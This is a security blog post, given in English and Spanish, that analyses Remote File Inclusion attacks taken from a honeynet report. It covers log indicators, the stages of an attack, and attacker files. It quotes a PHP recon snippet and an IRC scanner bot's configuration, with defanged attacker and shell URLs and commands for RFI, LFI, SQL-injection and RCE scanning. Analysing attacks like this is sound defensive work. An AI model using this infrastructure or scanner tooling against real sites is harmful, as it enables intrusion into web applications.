Remote File Inclusion Attacks – pt1Remote File Inclusion Attacks – pt1

One of the constant threats out on the internet are Remote File Inclusion (RFI) attacks. This class of threat is simple to execute and can yield very valuable results to the attacker. With the multitude of web applications out there, there are constantly new vulnerabilities discovered. The subject is rather large so I will have to make this a series of posts whose contents will discuss the tools, tactics and infrastructure used in these attacks.

For those needing more information on what RFI attacks are and how they work, please see this wikipedia article.

To start off, RFI attacks are easy to find. If you have a website chances are an automated attack has already paid it a visit. Here are a few things to check for when looking through web access logs:

File names beginning with “id”
Files with a .txt extension (exclude robots.txt and this list will be very small)
404 errors

The steps involved in most RFI attacks are as follows:

  1. Attackers scan the internet via a bot that checks several search engines to find vulnerable web applications.
  2. Once a vulnerable site is found, it is marked with an ID tag of sorts
  3. The scanner then tracks these ID tags and uploads a second script to gather basic information on the machine.
  4. The attacker then uploads a php shell which gives them control over the device
  5. More tools are uploaded such as other PHP IRC bots

To get a little inspiration I headed over to honeynet.cz and looked through some recent RFI attacks they received.
To truly understand an attack, it is best to obtain the attacker’s code. After a few minutes of searching, I found a
RFI attack site who’s directory was unsecured (note that this is all publicly obtainable information).

Honeynet.cz RFI attacker: hxxp://70.38.120.161/~anyhost/wp-content/uploads/chid

The chid file is a text file which is used as step 3 from the list above. Here are some of it’s contents:

echo "rzor was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";

Attacker files

Attacker files

bot.txt is fairly self explanatory, this is an RFI scanning bot which contains everything you need to know, including: IRC server / channel the bot connects to Administrative credentials to disable the bot Commands accepted Attacker information Related URLs Here is some of the pertinent information: my $id = "hxxp://70.38.120.161/~anyhost/wp-content/uploads/chid?"; #Your RFI Response my $shell = "hxxp://skoolage.angelfire.com/other.txt?"; #Shell printed on the Vulnerable Site my $ircd = "irc.ccpower.org"; #Irc-Server my $port = "6667"; #Irc-Server Port my $chan1 = "#rfi"; #Chan for Scan my $chan2 = "#rfi"; #Results will be printed here too my $nick = "[Lock]|ON|[stratos][".int(rand(1000))."]"; #Nick my @admins = ("rzor"); my $killpwd = "XXXXX"; #Password to Kill the Bot my $chidpwd = "XXXXX"; #Password to change the RFI Response [+] Coded by rzor [+] Contact: rzor[at]Gmail[dot]Com [+] Keep it private ! [+] *New release, more fun ;) [+] *Updated to: 4/11/2008 !rfi <bug> <dork> -p <sites/proc> > Start the RFI Scanner !lfi <bug> <dork> > Start the LFI Scanner !sql <bug> <dork> -p <sites/proc> > Start the SQL Injection Scanner !rce <bug> <dork> -p <sites/proc> > Start the RCE Scanner This bot (Scanner V6) is originally written by 0sirys, each attacker usually re-brands it with their nickname and email. You can find websites compromised with Osirys's bot by googling for "Osirys was here" The directory contains another RFI scnaning bot (rfiscan.txt) and some other curious tools in the /rapi and /tr directories. The /rapi/ directory contains a script to check to see if a given rapidshare account is valid. I don't know the specific reason for checking this, but if anyone does know, please leave a comment. The /tr/ directory contains a script (written in Spanish) to harvest email accounts by searching various search engines.
Harvester

Harvester

As you can see RFI attacks can be quite deadly but can be easy to disect. The series will continue in the next few days with more RFI attacks. Copies of these files are available to members of the security community, please drop me line if you are interested.

Uno de los constante amenazas sobre el internet es el ataque de Remote File Inclusion.
Este clase de amenza es simple a ejecutar y puede proporcionar muy valiosos resultados al atacante.

Con el multitud de aplicacións web por allí, hay constantamente nuevo vulnerabilidades discubrir.
El tema es muy largo entonces tendré a hacer este un serie de puestos de quién contenido discutirá las herramientas, tácticas y infraestructura usa en estes amenzas.

Aquéllos necesitando mas informacion sobre que ataques RFI son y como trabajan, por favor
vean este articulo de wikipedia.

Para empezar, ataques RFI son facil a encontrar. Si tiene un website casualidades son un ataque
automatico ya tiene visitarlo. Aqui son pocos cosas para buscar cuando mirando logs de web.

Nombres de ficheros empezando con “id”
Ficheros con extensión .txt
Errores 404

Los pasos por ataques de RFI son:

1. Atacante escanea el internet por un bot que busca variosas search engines para encontrar aplicaciones vulnerable.
2. Cuando un sitio vulnerable es encontrado, marca con un etiqueta
3. El escáner entonces encuentra estos etiquetas y subir un secundo script para reunir informacion
basico sobe la maquina.
4. Entonces el atacante sube un php shell que da control sobre la maquina.
5. Mas herramientas son subir como mas PHP IRC bots

Para obtener mas inspiración buscaba reciente ataques a honeynet.cz. Para entender verdaderamente un ataque, es mejor a obtener el código del atacante. Despues de pocos minutos, buscaba un sitio RFI que tenia un carpeta inseguro (todo este informacion es publico).

Honeynet.cz RFI attacker: hxxp://70.38.120.161/~anyhost/wp-content/uploads/chid

El fichero chid es un fichero de texto que es usado en paso 3 de la lista arriba. Aqui son alguno de
los contenidos:

echo "rzor was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";

Attacker files

Attacker files

bot.txt es facil a entender, este es un RFI scanning bot que contener todo que necesita conocer, incluiendo: IRC server / canal Credenciales Administrativo Instrucciónes aceptado URLs relacionado Aqui es alguno informacion importante: my $id = "hxxp://70.38.120.161/~anyhost/wp-content/uploads/chid?"; #Your RFI Response my $shell = "hxxp://skoolage.angelfire.com/other.txt?"; #Shell printed on the Vulnerable Site my $ircd = "irc.ccpower.org"; #Irc-Server my $port = "6667"; #Irc-Server Port my $chan1 = "#rfi"; #Chan for Scan my $chan2 = "#rfi"; #Results will be printed here too my $nick = "[Lock]|ON|[stratos][".int(rand(1000))."]"; #Nick my @admins = ("rzor"); my $killpwd = "XXXXX"; #Password to Kill the Bot my $chidpwd = "XXXXX"; #Password to change the RFI Response [+] Coded by rzor [+] Contact: rzor[at]Gmail[dot]Com [+] Keep it private ! [+] *New release, more fun ;) [+] *Updated to: 4/11/2008 !rfi <bug> <dork> -p <sites/proc> > Start the RFI Scanner !lfi <bug> <dork> > Start the LFI Scanner !sql <bug> <dork> -p <sites/proc> > Start the SQL Injection Scanner !rce <bug> <dork> -p <sites/proc> > Start the RCE Scanner Este bot (Scanner V6) is originalmente escribe por 0sirys, cada atacante usualmente lo marca con lo apodo y email. Se puede encontrar sitios que son hacked con el bot de Osirys para googling por "Osirys was here" La carpeta contiene un otro RFI bot (rfiscan.txt) y algun otro herramientas en las carpetas /rapi y /tr. La carpeta /rapi/ contiene un script para comprobar si un cuenta de rapidshare es válida. No se el espesifico razón por comprobando esto, pero si alguien sabe, por favor déjeme un comentario. The /tr/ directory contains a script (written in Spanish) to harvest email accounts by searching various search engines.
Harvester

Harvester

Como puede ver ataques RFI puede estar muy peligroso pero puede estar facil a investigar. El serie continuará en las proximas dias con mas ataques RFI. Copias de estos ficheros son disponible por la socia de seguridad. Por favor enviarme un mensaje si uds. es interesado.

2 comments to Remote File Inclusion Attacks – pt1Remote File Inclusion Attacks – pt1

  • Jaun Millalonco

    My first visit here, found the blog accidentally really, and I just wanted to say I’ve enjoyed my visit and had some good reads while here :)
    Juan

  • Jos

    If you run Drupal, install the RFI report module, it will report all failed RFI attacks with full details on the attacker, location of the RFI scripts, etc.